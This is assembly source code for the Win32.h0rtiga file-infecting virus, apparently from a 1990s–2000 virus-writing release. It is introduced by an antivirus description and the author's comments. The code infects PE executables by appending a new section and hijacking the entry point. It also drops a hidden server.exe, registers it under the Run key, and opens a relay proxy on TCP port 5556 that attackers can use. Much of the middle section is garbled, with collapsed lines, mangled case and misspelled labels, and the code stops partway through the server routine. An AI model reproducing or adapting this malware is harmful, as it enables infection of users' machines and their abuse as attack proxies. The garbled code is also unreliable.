; Win32.h0rtiga
;
; Win32.h0rtiga code by |zan [@ deepzone.org]
;
; ooo DeepZone - Digital Security Center
;
; http://www.deepzone.org
;
; ----------------------------------------------------------------------------
;
; Win32.h0rtiga
;
;
; AVP's description
;
; (http://www.avp.ch/avpve/newexe/win32/hortiga.stm)
;
; It is a non-memory-resident parasitic Win32 virus. It searches
; for PE EXE files (Windows executables), then writes itself to
; the end of the file. To reserve a place for its code the virus
; creates a new section with the ".|zan" name at the end of the
; file.
;
; The virus has "anonymous IP" ability. That means that a hacker
; may use infected machines as a "proxy server", sending packets
; with the infected machine's IP address:
;
;         IP1                    IP2                    IP3
;   Hacker's machine ----> Infected machine ----> Target machine
;
; A hacker connects to the infected machine by using his IP
; address (IP1) and forces the infected machine to forward packets
; to the target machine; then the infected machine's IP address (IP2)
; is used. Using this mechanism the hacker hides his IP address.
;
; The virus installs its "anonymous" component as a stand-alone
; program using the file name SERVER.EXE. That program is created in
; the Windows system directory and registered in the auto-start
; registry key:
;
;   HKLM\Software\Microsoft\Windows\CurrentVersion\Run
;   h0rtiga server = "%windir%\server.exe"
;
; where "%windir%" is the Windows system folder.
;
; The virus contains the text string:
;
;   (c) 2000. Win9x.h0rtiga v1.0 server activated - http://mareasvivas.cjb.net
;   Coded by |zan - izan@galaxycorp.com / izan@deepzone.org
;   Who are you ???
;
; This string is used as ID text on connection from the hacker's
; machine to the server on the infected machine.
;
; - End AVP description
;
; Win32.h0rtiga by |zan
;
; h0rtiga is a simple non-resident parasite. It wasn't developed as a
; traditional virus, but it ended up infecting Win32 machines.
; Originally it was proof-of-concept code showing Win9x's risks and
; holes in a Spanish whitepaper called "Win32.h0rtiga: Anonimato e
; Intrusión" (Anonymity and Intrusion). When extra code was added to
; patch PE files, inoculating the h0rtiga code into arbitrary files,
; it became a virus...
;
; h0rtiga infects by adding an extra section/object called ".|zan".
; It can infect under Win9x/NT/2K but its payload only runs on Win9x.
; (Note that the main routine below jumps to "salir" unless
; dwPlatformId is VER_PLATFORM_WIN32_WINDOWS, so neither the server
; drop nor the infection loop is reached on NT/2K as the code stands.)
; This runtime infector doesn't have "modern" features like stealth,
; encryption or polymorphism, but it does keep the "classic" ones like
; restoring the file timestamp and file attributes.
; Infecting with an extra section is "hard"; it would have been easier
; to add the viral code to the last section, but I wanted a clean,
; fast and easy disinfection, so I chose the primitive and hard way.
; The h0rtiga payload runs a single server listening on TCP port 5556.
; This server allows fully arbitrary relaying and can be driven with a
; generic h0rtiga client. Yes, that's it... Now you can imagine black
; hats exploiting infected Win9x machines: anonymous surfing, faking
; e-mails, bypassing IRC bans...
;
; The code contains clear labels and a lot of EQUs and structures
; documenting the viral code...
;
; Greetings...
; -------------
; Spanish sec/hack groups, ADM, beavuh, b0f, non-commercial groups...
;
; ... and, of course, VLAD & 29A. I'd like to give special thanks to
; Bumblebee/29A (fantastic vxer).
;
; I hope that h0rtiga can be a good contribution to this fantastic 29A
; release ;)
;
; Deep greets
; -----------
;
; ^Anuska^
; If you hit two times we'll hack their networks... sorry, mouse
; support isn't available ;)
;
; TheWizard can handle Windows ;)
; Nemo
;
; Special greetings...
; ---------------------
; Win32.h0rtiga is dedicated to Sandra...
;
;
; ----------------------------------------------------------------------------
; Win32.h0rtiga - Begin virus code (W32H0RTIGA.ASM)
; ----------------------------------------------------------------------------

; ------------------------------------------------------------ Compiler options
; ----------------------------------------------------------------------------
.386p
locals
jumps
.model flat, stdcall

; ------------------------------------------------------------
; Just to show a message on virus 1st generation
; ------------------------------------------------------------
extrn   MessageBoxA:proc
extrn   GetModuleHandleA:proc
extrn   ExitProcess:proc

; ----------------------------------------------------------------------------
; Data section
; ----------------------------------------------------------------------------
.data
        db      0

; ----------------------------------------------------------------------------
; Code section
; ----------------------------------------------------------------------------
.code
start:
; ------------------------------------------------------------
; h0rtiga main
; ------------------------------------------------------------
        mov     eax,[esp]                       ; return address into kernel32
gkerloop:
        xor     edx,edx
        dec     eax
        mov     dx,[eax+3Ch]                    ; e_lfanew candidate
        test    dx,0F800h
        jnz     gkerloop
        cmp     eax,[eax+edx+34h]               ; ImageBase == candidate base?
        jnz     gkerloop
        call    gdelta
gdelta: pop     ebp
        sub     ebp,offset gdelta               ; delta offset
        lea     edi,[ebp+kernel]
        stosd                                   ; kernel32 base
        lea     esi,[ebp+sz_mgetprocaddr]
        call    getapiexpk32
        lea     edi,[ebp+ddgetprocaddress]
        stosd
        lea     esi,[ebp+sz_mloadlibrarya]
        call    getapiexpk32
        lea     edi,[ebp+ddloadlibrarya]
        stosd
        lea     esi,[ebp+sz_mkernel32]
        lea     edi,[ebp+addr_apis]
        mov     ebx,numapisk32
        call    maketabla                       ; resolve the kernel32 table
        lea     esi,[ebp+osversioninfo.dwosversioninfosize]
        push    sizeof_osversioninfo
        pop     ecx
        xor     al,al
delit:  stosb                                   ; edi already points at osversioninfo after maketabla
        loop    delit
        lea     edi,[ebp+osversioninfo.dwosversioninfosize]
        mov     eax,sizeof_osversioninfo        ; 148
        stosd
        sub     edi,4
        push    edi
        call    dword ptr [ebp+ddgetversionexa]
        test    eax,eax
        jz      salir
        cmp     [ebp+osversioninfo.dwplatformid],VER_PLATFORM_WIN32_WINDOWS
        jnz     salir                           ; Win9x only
        call    insertaservidor                 ; drop server.exe + Run key
        call    buscahosttoinfect               ; FindFirstFileA *.exe
        cmp     eax,INVALID_HANDLE_VALUE
        jz      salir
        xchg    eax,ebx
infectamas:
        call    infecit
        call    continuabusqueda
        test    eax,eax
        jnz     infectamas
        call    terminabusqueda
salir:
        lea     esi,[ebp+oldentrypointrva]
        lodsd
        xchg    ebx,eax
        push    0
        call    dword ptr [ebp+ddgetmodulehandlea]
        add     eax,ebx
        jmp     eax                             ; back to the host entry point

; ------------------------------------------------------------
; Begin h0rtiga data
; ------------------------------------------------------------
FILETIME struc
  ft_dwLowDateTime              dd ?
  ft_dwHighDateTime             dd ?
FILETIME ends

MAX_PATH equ 260

WIN32_FIND_DATA struc
  wfd_dwFileAttributes          dd ?
  wfd_ftCreationTime            FILETIME ?
  wfd_ftLastAccessTime          FILETIME ?
  wfd_ftLastWriteTime           FILETIME ?
  wfd_nFileSizeHigh             dd ?
  wfd_nFileSizeLow              dd ?
  wfd_dwReserved0               dd ?
  wfd_dwReserved1               dd ?
  wfd_szFileName                db MAX_PATH dup (?)
  wfd_szAlternateFileName       db 13 dup (?)
                                db 3 dup (?)
WIN32_FIND_DATA ends
sizeof_win32_find_data  equ size WIN32_FIND_DATA

INVALID_HANDLE_VALUE    equ -1
VER_PLATFORM_WIN32_WINDOWS equ 1

_OSVERSIONINFO struc
  dwOSVersionInfoSize           dd ?
  dwMajorVersion                dd ?
  dwMinorVersion                dd ?
  dwBuildNumber                 dd ?
  dwPlatformId                  dd ?
  szCSDVersion                  db 128 dup (?)
_SVersionInfo Ends Sizeof_OSversionInfo Equ Size_SVersionInfo SZ_MGETPROCADDR DB 'GETPROCADDRESS', 0 DDGETPROCADDRESS DD? SZ_MLOADLIBRARYA DB 'LOADLIBRARYA', 0 DDLOADLIBRARYA DD? KERNEL DD? Counter dw? AddResSTableva DD? OrdinalTableva DD? Numapisk32 EQU 21 SZ_MKERNEL32 DB 'KERNEL32', 0 Tablak32 db 'EXITPROCESS', 0 DB 'getversionexa', 0 DB 'FindfirstFilea', 0 DB 'FINDNEXTFILEA', 0 DB 'FindClose', 0 DB 'CreateFilea', 0 DB 'CreateFilemappinga', 0 DB 'MapViewOffile', 0 DB 'UnmapViewOffile', 0 DB 'CloseHandle', 0 DB 'setFileAttributesa', 0 DB 'setFiletime', 0 DB 'getModuleHandlea', 0 DB 'getcommandlinea', 0 DB 'getSystemDirectorya', 0 DB 'Readfile', 0 DB 'Writefile', 0 DB 'setFilePointer', 0 DB 'getcurrentprocessid', 0 DB 'registerServiceProcess', 0 DB 'GlobalAlloc', 0 AddR_apis: DDEXITPROCESS DD? DDGETVERSIONEXA DD? DDFINDFIRSTFILEA DD? DDFINDNEXTFILEA DD? DDFINDCLOSE DD? DDCREATEFILEA DD? DDCREATEFILEMAPPINGA DD? DDMAPVIEWOFFILE DD? DDUNMAPVIEWOFFILE DD? DDCLOSEHANDLE DD? DDSETFILEATTRIBUTESA DD? DDSETFILETIME DD? DDGETMODULEHANDLEA DD? DDGETCOMMANDLINEA DD? DDGETSYSTEMDIRECTORYA DD? DDREADFILE DD? DDWRITEFILE DD? DDSETFILEPOINTER DD? DDGETCURRENTPROCESSID DD? DDREGISTERSERVICEPROCESS DD? DDGLOBALLOC DD? OsversionInfo _OSVERSIONINFO? _masKexe DB '* .exe', 0 Maxinfeccion EQU 6 Winfinddata Win32_find_data? HficActual DD? HCMAPAAl DD? NewObject: Oname DB ". | Zan", 0, 0, 0 Virtualsize DD 0 RVA DD 0 PhysicalSize DD 0 PhysicalOffset DD 0 Reserved DD 0, 0, 0 Objectflags DD 0e0000060H Sizeof_newobject EQU 28h ObjectTableOffset DD? NumObjects DW? ObjectAlign DD? FileAlign DD? ImageSize DD? SizeTomap DD? OldEntryPoinTrva DD? HREAD DD? HWRITE DD? BYTES_RW DD? SZ_EXEC DB 260 DUP (?) SZ_NSERVER DB 'Server.exe', 0 Addr1 DW 2 DW 0B415H DD? Addr2 DW 2 DW 0000h DB 192, 168, 0, 1 SOCK1 DD? SOCK2 DD? Gotit DD? Buffsz EQU 4096 Adrbuff DD? FD_SET1 DD 1,0 FD_SET2 DD 1,0 FD_set struc NO DD 0 Sockh DD 0 FD_SET ENDS TTL DD 0,64h Semaforo DB 0 Countbouncer DB 0 MsgentryServer DB '(c) 2000. 
Win9x.h0rtiga v1.0 server activated - http://mareasvivals.cjb.net', 13, 10 DB 'Coded by | zan - izan@galaxycorp.com / izan@deepzone.org', 13, 10, 13, 10 DB 'Who Are you ???', 13, 10 MSGENTRYSERVERLEN EQU $ -MsgentryServer Numapisw32 EQU 10 SZ_MW32 DB 'WSOCK32', 0 Tablaw32 db 'wsastartup', 0 DB 'Socket', 0 DB 'bind', 0 DB 'Listen', 0 DB 'accept', 0 DB 'Connect', 0 DB 'Send', 0 DB 'RECV', 0 DB 'SELECT', 0 DB 'CloseSocket', 0 AddR_apis2: DDWSASSTARTUP DD? DDSOCKET DD? DDBIND DD? DDLISTEN DD? DDACCEPT DD? DDCONNECT DD? DDSEND DD? DDRECV DD? DDSELECT DD? DDCLOSESSOCKET DD? Numapisadv32 EQU 3 SZ_MADV32 DB 'Advapi32', 0 Tablaadv32 DB 'RegcreateKeyexa, 0 DB 'RegSetValueexa, 0 DB 'regclosekey', 0 AddR_apis3: DDREGCREATEKEYEXA DD? DDREGSETVALUEEXA DD? DDREGCLOSEKEY DD? DISPOSITION DD? KEYHANDLE DD? CLASE DB 'Run', 0 Claselen EQU $ -Clase Subkey DB 'SoftwareMicrosoftWindowsCurrentVersionRun', 0 KeyValuelen DD? Keyname DB 'H0RTIGA Server', 0 ; ------------------------------------------------- ----------- ; End H0rtiga Data ; ------------------------------------------------- ----------- Getapiexpk32: Mov Edx, ESI @ _1: CMP BYTE PTR [ESI], 0 JZ @ _2 Inc ESI JMP @ _1 @ _2: inc ESI SUB ESI, EDX MOV ECX, ESI XOR EAX, EAX MOV Word PTR [EBP Counter], AX MOV ESI, [EBP KERNEL] Add ESI, 3CH Lodsw Add Eax, [EBP KERNEL] MOV ESI, [EAX 78H] Add ESI, [EBP KERNEL] Add ESI, 1CH Lodsd Add Eax, [EBP KERNEL] MOV DWORD PTR [EBP AddResSTableva], EAX Lodsd Add Eax, [EBP KERNEL] Push EAX Lodsd Add Eax, [EBP KERNEL] MOV DWORD PTR [EBP OrdinalTableva], EAX POP ESI @ _3: Push ESI Lodsd Add Eax, [EBP KERNEL] Mov ESI, EAX MOV EDI, EDX Push ECX CLD REP CMPSB POP ECX JZ @ _4 POP ESI Add ESI, 4 Inc Word PTR [EBP Counter] JMP @ _3 @ _4: POP ESI Movzx Eax, Word PTR [EBP Counter] SHL EAX, 1 Add Eax, DWORD PTR [EBP OrdinalTableva] XOR ESI, ESI XCHG Eax, ESI Lodsw SHL EAX, 2 Add Eax, DWORD PTR [EBP AddRessTableva] Mov ESI, EAX Lodsd Add Eax, [EBP KERNEL] RET Maketabla: Push ESI Call DWORD PTR [EBP DDLOADLIBRARYA] 
Push EBX POP ECX Push EAX POP EBX Buki: LODSB Test Al, Al JNZ Buki MT1: PUSH ECX PUSH ESI Push EBX Call DWORD PTR [EBP DDGETPROCADDRESS] Push EAX MT2: LODSB Test Al, Al JNZ MT2 POP EAX Stosd POP ECX LOOP MT1 RET BuscahostToinfect: Lea EDI, EBP Counter XOR AX, AX Stosw LEA ESI, EBP WINFINDDATA PUSH ESI LEA ESI, EBP _MASKEXE PUSH ESI Call DWORD PTR [EBP DDFINDFIRSTFILEA] RET Infecit: Push EBX Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME Call Esinfectable CMP EAX, -1 JZ II_ERROR Call EliminaTributosFichero Test Eax, EAX JZ II_ERROR Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME Push DWORD PTR [EBP SIZETOMAP] POP EBX Call Open & Maped_file_rw CMP EAX, -1 JZ II_ERROR Push EAX POP EBX Add Eax, [EBX 3CH] Push EAX POP EDX Lea EDI, EBP imagesize Mov Eax, DWORD PTR [EDX 50H] Stosd Lea EDI, EBP NUMOBJECTS MOV AX, Word PTR [EDX 6H] Stosw Lea EDI, EBP ObjectAlign MOV EAX, DWORD PTR [EDX 38H] Stosd MOV EAX, DWORD PTR [EDX 3CH] Stosd XOR EAX, EAX Add Ax, Word PTR [EDX 14H] Add Eax, 18h Add Eax, [EBX 3CH] Add Eax, EBX MOV DWORD PTR [EBP ObjectTableOffset], EAX Push EAX POP ESI XOR EAX, EAX MOV AX, Word PTR [EBP NUMOBJECTS]] Push sizeof_newobject POP ECX XOR EDX, EDX Mul ECX Add ESI, ESI Inc Word PTR [EBP NUMOBJECTS]] PUSH ESI POP EDI Mov Eax, [EDI - SIZEOF_NEWOBJECT 8] Add Eax, [EDI - SIZEOF_NEWOBJECT 12] MOV ECX, DWORD PTR [EBP ObjectAlign] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP RVA], EAX MOV ECX, DWORD PTR [EBP FileAlign] Push Virlenght POP EAX XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP Physicalsize], EAX MOV ECX, DWORD PTR [EBP ObjectAlign] Push Virlenght POP EAX XOR EDX, EDX Div ECX INC EAX Mul ECX Mov DWORD PTR [EBP VIRTUALSIZE], EAX MOV EAX, [EDI - SIZEOF_NEWOBJECT 20] Add Eax, [EDI - SIZEOF_NEWOBJECT 16] MOV ECX, DWORD PTR [EBP FILALIN] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP PhysicalOffset], EAX Push Virlenght POP EAX Add Eax, DWORD PTR [EBP ImageSize] MOV ECX, DWORD PTR [EBP ObjectAlign] XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR 
[EBP ImageSize], EAX LEA ESI, EBP NewObject MOV ECX, 10 REP MOVSD Lea ESI, EBP NUMOBJECTS MOV EDX, [EBX 3CH] Add Edx, EBX Lea EDI, [EDX 6h] Movsw Lea ESI, EBP ImageSize Lea EDI, [EDX 50H] Movsd MOV EAX, DWORD PTR [EBP OldentryPoinTrva] Push EAX Push EBX POP EDX Add Edx, [EBX 3CH] Mov Eax, DWORD PTR [EDX 28H] Lea EDI, EBP OldentryPointRVA Stosd MOV EAX, DWORD PTR [EBP RVA] Mov DWORD PTR [EDX 28H], EAX Lea ESI, EBP START MOV EAX, DWORD PTR [EBP PhysicalOffset] Add Eax, EBX XCHG Eax, EDI Mov ECX, Virlenght REP MOVSB POP EAX MOV DWORD PTR [EBP OldentryPointRva], EAX MOV Word PTR [EDX 4CH], 0D00DH Add EBP Counter, 1 XCHG EAX, EBX Call Close & Unmaped_file_rw Call RestauratributosFichero Test Eax, EAX JZ II_ERROR II_ERROR: POP EBX RET ContinuabusQueda: CMP [EBP Counter], MaxInfeccion JZ CB_END LEA ESI, EBP WINFINDDATA PUSH ESI Push EBX Call DWORD PTR [EBP DDFINDNEXTFILEA] RET CB_END: XOR EAX, EaxRet TerminabusQueda: Push EBX Call DWORD PTR [EBP DDFINDCLOSE] RET Open & maped_file_rw: PUSH 0 PUSH 0 Push 3h PUSH 0 PUSH 0 Push 80000000h OR 40000000H PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ OMF_ERROR Lea EDI, EBP HFICACTUAL Stosd PUSH 0 Push EBX PUSH 0 Push 4h PUSH 0 Push EAX Call DWORD PTR [EBP DDCREATEFILEMAPPINGA] Test Eax, EAX JZ OMF_ERROR Lea EDI, EBP HCMAPACTUAL Stosd Push EBX PUSH 0 PUSH 0 Push 2H Push EAX Call DWORD PTR [EBP DDMAPVIEWOFFILE] Test Eax, EAX JZ OMF_ERROR RET OMF_ERROR: PUSH -1 POP EAX RET Close & Unmaped_file_rw: Push EAX Call DWORD PTR [EBP DDUNMAPVIEWOFFILE] Test Eax, EAX JZ CUF_ERROR Lea ESI, EBP WINFINDDATA.WFD_FTLASTWRITETIME PUSH ESI Lea ESI, EBP WINFINDDATA.WFD_FTLASTACCESSTIME PUSH ESI Lea ESI, EBP WINFINDDATA.WFD_FTCREATIONTIME PUSH ESI LEA ESI, EBP HFICACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDSETFILETIME] Lea ESI, EBP HCMAPACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] LEA ESI, EBP HFICACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ CUF_ERROR XOR EAX, EAX RET CUF_ERROR: PUSH -1 POP EAX 
RET EliminaTributosFichero: Push 80h Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME PUSH ESI Call DWORD PTR [EBP DDSETFILEATTRIBUTESA] RET RestauratributosFichero: Lea ESI, EBP WINFINDDATA.WFD_DWFILEATTRIBUTES Lodsd Push EAX Lea ESI, EBP WINFINDDATA.WFD_SZFILENAME PUSH ESI Call DWORD PTR [EBP DDSETFILEATTRIBUTESA] RET Esinfectable: PUSH 0 PUSH 0 Push 3h PUSH 0 PUSH 0 Push 80000000H PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ OMFR_ERROR Lea EDI, EBP HFICACTUAL Stosd PUSH 0 PUSH 0 PUSH 0 Push 2H PUSH 0 Push EAX Call DWORD PTR [EBP DDCREATEFILEMAPPINGA] Test Eax, EAX JZ OMFR_ERROR Lea EDI, EBP HCMAPACTUAL Stosd PUSH 0 PUSH 0 PUSH 0 Push 4h Push EAX Call DWORD PTR [EBP DDMAPVIEWOFFILE] Test Eax, EAX JZ OMFR_ERROR Push EAX Push EAX POP EDX Add Eax, [EDX 3CH] CMP Word Ptr [EDX], 'ZM' JNZ NOINFECT CMP Word PTR [EAX], 'EP' JNZ NOINFECT CMP Word PTR [EAX 4CH], 0D00DH JNZ SiINFECT NOINFECT: PUSH -1 POP EBX JMP SNINFECT SiINFECT: CALL CALCULASITOMAP SNINFECT: CALL DWORD PTR [EBP DDUNMAPVIEWOFFILE] Test Eax, EAX JZ OMFR_ERROR Lea ESI, EBP HCMAPACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ OMFR_ERROR LEA ESI, EBP HFICACTUAL Lodsd Push EAX Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ OMFR_ERROR XCHG EBX, EAX RET OMFR_ERROR: PUSH -1 POP EAX RET Calculasizeetomap: Push EAX POP EBX XCHG EBX, EDX XOR EAX, EAX MOV AX, Word PTR [EDX 6H] MOV Word PTR [EBP NUMOBJECTS], AX XOR EAX, EAX Add Ax, Word PTR [EDX 14H] Add Eax, 18h Add Eax, EDX MOV DWORD PTR [EBP ObjectTableOffset], EAX Push EAX POP ESI XOR EAX, EAX MOV AX, Word PTR [EBP NUMOBJECTS]] Push sizeof_newobject POP ECX XOR EDX, EDX Mul ECX Add ESI, ESI XOR EDX, EDX Add Edx, [EBX 3CH] Add Edx, EBX Lea EDI, EBP FileAlign MOV EAX, DWORD PTR [EDX 3CH] Stosd MOV ECX, DWORD PTR [EBP FILALIN] Push Virlenght POP EAX XOR EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP Physicalsize], EAX MOV EAX, [ESI - SIZEOF_NEWOBJECT 20] Add Eax, [ESI - SIZEOF_NEWOBJECT 16] MOV ECX, DWORD PTR [EBP FILALIN] XOR 
EDX, EDX Div ECX INC EAX Mul ECX MOV DWORD PTR [EBP PhysicalOffset], EAX XCHG EBX, EAX Lea ESI, EBP PhysicalSize Lodsd Add Ebx, EAX MOV DWORD PTR [EBP SizetOMap], EBX RET INSERTAREGISTRO: LEA ESI, EBP SZ_MADV32 Lea EDI, EBP AddR_APIS3 Mov EBX, NUMAPISADV32 Call MakeTabla Lea ESI, EBP DISPSITION PUSH ESI Add ESI, 4 PUSH ESI PUSH 0 Push 0F003FH PUSH 0 Add ESI, 4 PUSH ESI PUSH 0 Add ESI, CLASELEN PUSH ESI Push 80000002H Call DWORD PTR [EBP DDREGCREATEKEYEXA] Test Eax, EAX Jnz reg_error Lea ESI, EBP KeyHandle Lodsd XCHG EAX, EBX Push DWORD PTR [EBP KeyValuelen] LEA ESI, EBP SZ_EXEC PUSH ESI Push 1h PUSH 0 LEA ESI, EBP Keyname PUSH ESI Push EBX Call DWORD PTR [EBP DDREGSETVALUEEXA] Test Eax, EAX Jnz reg_error Push EBX Call DWORD PTR [EBP DDREGCLOSEKEY] REG_ERROR: RET INSERTASERVIDOR: Call DWORD PTR [EBP DDGETCOMMANDLINEA] Push EAX POP ESI Lea EDI, EBP SZ_EXEC OT_Bmas: LODSB Stosb Test Al, Al JNZ OT_BMAS PUSH 0 Push 00000080H Push 3 PUSH 0 Push 00000001H Push 80000000H LEA ESI, EBP SZ_EXEC PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ ErrorX MOV DWORD PTR [EBP HREAD], EAX Push 260 LEA EBX, EBP SZ_EXEC Push EBX Call Dword PTR [EBP DDGETSYSTEMDIRECTORYA] Test Eax, EAX JZ ErrorX Add Eax, EBX XCHG Eax, EDI LEA ESI, EBP SZ_NSERVER OT_BMAS2: LODSB Stosb Test Al, Al JNZ OT_Bmas2 MOV DWORD PTR [EBP KeyValuelen], 0 LEA ESI, EBP SZ_EXEC Calclenstr: Lodsb INC DWORD PTR [EBP KeyValuelen] Test Al, Al JNZ Calclenstr Call insertaregistro PUSH 0 Push 00000080H Push 1 PUSH 0 Push 0h Push 40000000H LEA ESI, EBP SZ_EXEC PUSH ESI Call DWORD PTR [EBP DDCREATEFILEA] CMP EAX, -1 JZ ErrorX MOV DWORD PTR [EBP HWRITE], EAX Read_again: xor Eax, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 260 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] Test Eax, EAX JZ ErrorX LEA ESI, EBP BYTES_RW Lodsd Test Eax, EAX JZ FDF XCHG EAX, EBX XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push EBX LEA ESI, EBP SZ_EXEC PUSH ESI LEA 
ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDWRITEFILE] Test Eax, EAX Jnz Read_Again JZ ErrorX FDF: PUSH 0 PUSH 0 Push 3ch LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] PUSH 0 PUSH 0 LEA ESI, EBP SZ_EXEC Lodsd Add Eax, 40 Push EAX Push EAX POP EBX LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] LEA ESI, EBP SZ_EXEC Lodsd Add Eax, Offsserver PUSH 0 PUSH 0 Push EBX Push EAX POP EBX LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] Push EBX POP EAX Lea EDI, EBP SZ_EXEC Stosd XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDWRITEFILE] PUSH 0 PUSH 0 Push 3ch LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 4 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDREADFILE] PUSH 0 PUSH 0 LEA ESI, EBP SZ_EXEC Lodsd Add Eax, 92 Push EAX Push EAX POP EBX LEA ESI, EBP HREAD Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] PUSH 0 PUSH 0 Push EBX Push EAX POP EBX LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDSETFILEPOINTER] Push 2 POP EAX Lea EDI, EBP SZ_EXEC Stosd XOR EAX, EAX Push EAX Lea EDI, EBP BYTES_RW Push EDI Stosd Push 2 LEA ESI, EBP SZ_EXEC PUSH ESI LEA ESI, EBP HWRITE Lodsd Push EAX Call DWORD PTR [EBP DDWRITEFILE] LEA ESI, EBP HREAD PUSH ESI Call DWORD PTR [EBP DDCLOSEHANDLE] Test Eax, EAX JZ ErrorX LEA ESI, EBP HWRITE PUSH ESI Call DWORD PTR [EBP DDCLOSEHANDLE] ErroRex: Ret Error: Push 0 Call DWORD PTR [EBP DDEXITPROCESS] OFFSSERVER 
                equ     $-start                 ; (offsserver) offset of the server code inside the virus body

; ------------------------------------------------------------
; h0rtiga server (dropped as server.exe, listens on TCP 5556)
; ------------------------------------------------------------
server:
        mov     eax,[esp]
gkerloop2:
        xor     edx,edx
        dec     eax
        mov     dx,[eax+3Ch]
        test    dx,0F800h
        jnz     gkerloop2
        cmp     eax,[eax+edx+34h]
        jnz     gkerloop2
        call    gdelta2
gdelta2:
        pop     ebp
        sub     ebp,offset gdelta2
        lea     edi,[ebp+kernel]
        stosd
        lea     esi,[ebp+sz_mgetprocaddr]
        call    getapiexpk32
        lea     edi,[ebp+ddgetprocaddress]
        stosd
        lea     esi,[ebp+sz_mloadlibrarya]
        call    getapiexpk32
        lea     edi,[ebp+ddloadlibrarya]
        stosd
        lea     esi,[ebp+sz_mkernel32]
        lea     edi,[ebp+addr_apis]
        mov     ebx,numapisk32
        call    maketabla
        lea     esi,[ebp+sz_mw32]
        lea     edi,[ebp+addr_apis2]
        mov     ebx,numapisw32
        call    maketabla                       ; resolve the wsock32 table
        call    dword ptr [ebp+ddgetcurrentprocessid]
        push    1
        push    eax
        call    dword ptr [ebp+ddregisterserviceprocess]  ; Win9x: hide from the task list
        push    buffsz
        push    0
        call    dword ptr [ebp+ddgloballoc]     ; 4096-byte relay buffer
        cmp     eax,-1
        je      error
        mov     dword ptr [ebp+adrbuff],eax
        push    eax                             ; WSADATA (reuses the buffer)
        push    101h
        call    dword ptr [ebp+ddwsastartup]
        push    6                               ; IPPROTO_TCP
        push    1                               ; SOCK_STREAM
        push    2                               ; AF_INET
        call    dword ptr [ebp+ddsocket]
        cmp     eax,-1
        je      error
        mov     dword ptr [ebp+sock1],eax
        push    16
        lea     esi,[ebp+addr1]                 ; sockaddr_in, port 5556 (0B415h)
        push    esi
        lea     esi,[ebp+sock1]
        lodsd
        push    eax
        call    dword ptr [ebp+ddbind]
        cmp     eax,-1
        je      error
        push    1
        lea     esi,[ebp+sock1]
        lodsd
        push    eax
        call    dword ptr [ebp+ddlisten]
        mov     byte ptr [ebp+semaforo],0       ; 0 = configuration mode
configit:
        mov     al,byte ptr [ebp+semaforo]
        test    al,al
        jnz     quees?
        push    0
        push    0
        lea     esi,[ebp+sock1]
        lodsd
        push    eax
        call    dword ptr [ebp+ddaccept]
        mov     dword ptr [ebp+gotit],eax
        push    0
        push    msgentryserverlen
        lea     esi,[ebp+msgentryserver]
        push    esi
        lea     esi,[ebp+gotit]
        lodsd
        push    eax
        call    dword ptr [ebp+ddsend]          ; banner to whoever connects
        push    0
        push    buffsz
        lea     esi,[ebp+adrbuff]
        lodsd
        push    eax
        lea     esi,[ebp+gotit]
        lodsd
        push    eax
        call    dword ptr [ebp+ddrecv]
        xchg    ebx,eax
        lea     esi,[ebp+gotit]
        lodsd
        push    eax
        call    dword ptr [ebp+ddclosesocket]
        cmp     ebx,8                           ; configuration record is exactly 8 bytes
        jnz     configit
        lea     esi,[ebp+adrbuff]
        lodsd
        xchg    esi,eax
        lodsw                                   ; byte 0: action
        mov     byte ptr [ebp+semaforo],al
        lea     edi,[ebp+addr2]
        add     edi,2
        movsw                                   ; bytes 2-3: sin_port (network order)
        movsd                                   ; bytes 4-7: sin_addr
        jmp     configit
quees?:
        dec     al
        test    al,al
        jz      bis0                            ; action 1 = bounce
        mov     byte ptr [ebp+semaforo],0       ; anything else: back to configuration
        jmp     configit
bis0:
